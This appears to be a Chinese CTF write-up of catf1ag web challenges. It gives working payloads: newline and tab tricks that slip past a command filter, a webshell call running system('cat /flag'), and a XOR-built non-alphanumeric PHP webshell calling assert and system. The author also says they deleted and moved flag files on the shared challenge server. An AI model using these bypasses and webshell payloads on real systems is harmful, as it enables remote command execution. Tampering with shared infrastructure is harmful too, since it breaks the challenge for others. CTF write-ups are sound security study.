catf1ag Web writeup(wp) 可能会持续更新

本文详述了作者在一系列Web安全挑战中的解题过程,涉及命令执行、文件包含、弱比较、字符串处理等多个方面。通过分析源代码、利用PHP特性以及各种编码技巧,作者成功找到并利用了多个漏洞,揭示了Web安全的重要性和复杂性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

命令执行之我在干什么

换行绕过strstr,%09绕空格
a=yyds%0als%09/
看见flag在根目录,但是过滤了*和flag
用正则

?a=yyds%0Anl%09/fla[g]

签到题

源代码

webshell

网站被黑了,发现robots.txt,访问里面的地址,源代码有个aGFja2Vy
base解码得到hacker
于是传

webshe11.php?hacker=system('cat /flag');

其次,我发现扫描有一个1.txt,直接访问就是flag,应该是哪位好心人写的。
所以我也好心的删掉了。

无字符webshell

过滤A-Za-z0-9
参考浅析无字符数字构造webshell
采用里面的异或,即

$_="`{
  
  {
  
  {"^"?<>/";${$_}[_](${$_}[__]);
#$_GET[_]($_GET[__])

于是得到最终payload

?cmd=$_="`{
  
  {
  
  {"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=system('tac /flag');

当然如果你是在我写wp之前做的,你会发现这道题直接访问flag.txt就可以拿到flag了,而我看我以前的payload是tac f111ag。
为了继续当好心人,我就好心的mv fla

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值